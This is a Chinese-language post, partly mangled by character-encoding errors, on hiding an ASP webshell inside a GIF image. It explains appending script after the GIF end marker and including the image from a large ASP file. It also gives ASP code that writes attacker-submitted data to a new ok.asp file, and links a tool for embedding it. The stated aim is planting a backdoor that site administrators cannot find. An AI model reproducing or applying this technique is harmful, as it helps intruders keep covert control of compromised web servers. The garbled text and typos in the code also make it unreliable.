腳本后門的發(fā)展史:
1,
腳本后門之圖片中的后門腳本安全
。最開始就是直接放一個(gè)ASP文件上去。2。把ASP文件加密才放上去。
3。把腳本插入到代碼中去。(我經(jīng)常用這種)
不過一樣被查得出來,我前段時(shí)候手工檢測一個(gè)站的腳本安全。
發(fā)現(xiàn)這個(gè)站被種了21個(gè)木馬。
所以我就想到了,怎么樣才能不被發(fā)現(xiàn)不能被查殺。
最后我研究了一下如果把腳本插入到圖片中。
然后在ASP中調(diào)用圖片中的腳本程序應(yīng)該就可以了。
測試的時(shí)候通過了。
現(xiàn)在我把我的心德寫一下。
讓大家來分析一下。共同進(jìn)步和完善這種方法。
在研究過程中我看了GIF圖片的結(jié)構(gòu)文檔方面的書。
GIF圖片都是以 00 3B 為結(jié)束的。
換句話說00 3B 后面的不會顯示出來。
所以我們在00 3B后面插入代碼就行了。
當(dāng)然代碼我們加密放到圖片中去效果更好。
我寫了一個(gè)程序來這么做。
這里要說一下,在圖片中00 3B后面的是不會顯示出來的。
但其中的代碼已經(jīng)運(yùn)行了。圖片也會正常顯示出來。
測試:
在圖片后面加入:<%=now%>
然后在一個(gè)ASP文件中加入:
然后你們下載這個(gè)圖片,發(fā)現(xiàn)圖片最后面變成了時(shí)間。很正常因?yàn)閳D片放到了ASP腳本中運(yùn)行了其中的代碼。
換句話來說,如果寫的是一段生成文件的腳本。
那么我們提交特定的參數(shù)讓圖片中的代碼去生成文件。
這樣就實(shí)現(xiàn)了我們的后門。
1:這種方法要做的工作就是在目標(biāo)站點(diǎn)中找一張GIF圖片然后把代碼插入到圖片中,再上傳到站點(diǎn)中去。這樣作管理員很難找到木馬在哪里。打死也想不到木馬在圖片中。
2:我們插入的代碼只有一行就是那個(gè)include file .....
找個(gè)文件大點(diǎn)的ASP文件給插進(jìn)去就行了。
然后我們在本地POST數(shù)據(jù)提交給ASP引用圖片的URL這樣就完成了工作,
電腦資料
《腳本后門之圖片中的后門腳本安全》(http://m.msguai.com)。我的插入圖片的腳本:
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set bjFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set bjCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set bjCountFile=Nothing %>
<% Set bjFSO = Nothing %>
這段代碼主要就是在當(dāng)前目錄下生成一個(gè)ok.asp文件。
文件內(nèi)容是由我們提交的數(shù)據(jù).用request("cyfddata")來獲取的。
這段代碼加密后插入到圖片中去。
下面我把我程序的代碼貼出來。(倒程序代碼沒有打包在里面。明天再貼上來)
現(xiàn)在給程序地址下載:
點(diǎn)這里下載測試程序。
本地自己構(gòu)建一個(gè)提交表單向ASP文件提交(加入圖片那個(gè)文件)
表單文本框輸入內(nèi)容名稱是:cyfddata
后感:
我本人認(rèn)為這種方法,管理員很難查到。這是我兩天前想到的作出來了,
可能有些問題希望和大家一起討論,必競,為了追求技術(shù)就得研究技術(shù)。
共享知識,從而升華。
感覺去研究一些新東西,人活得更XS些。
利用程序
www.dv28.com/live/ScriptInpic.rar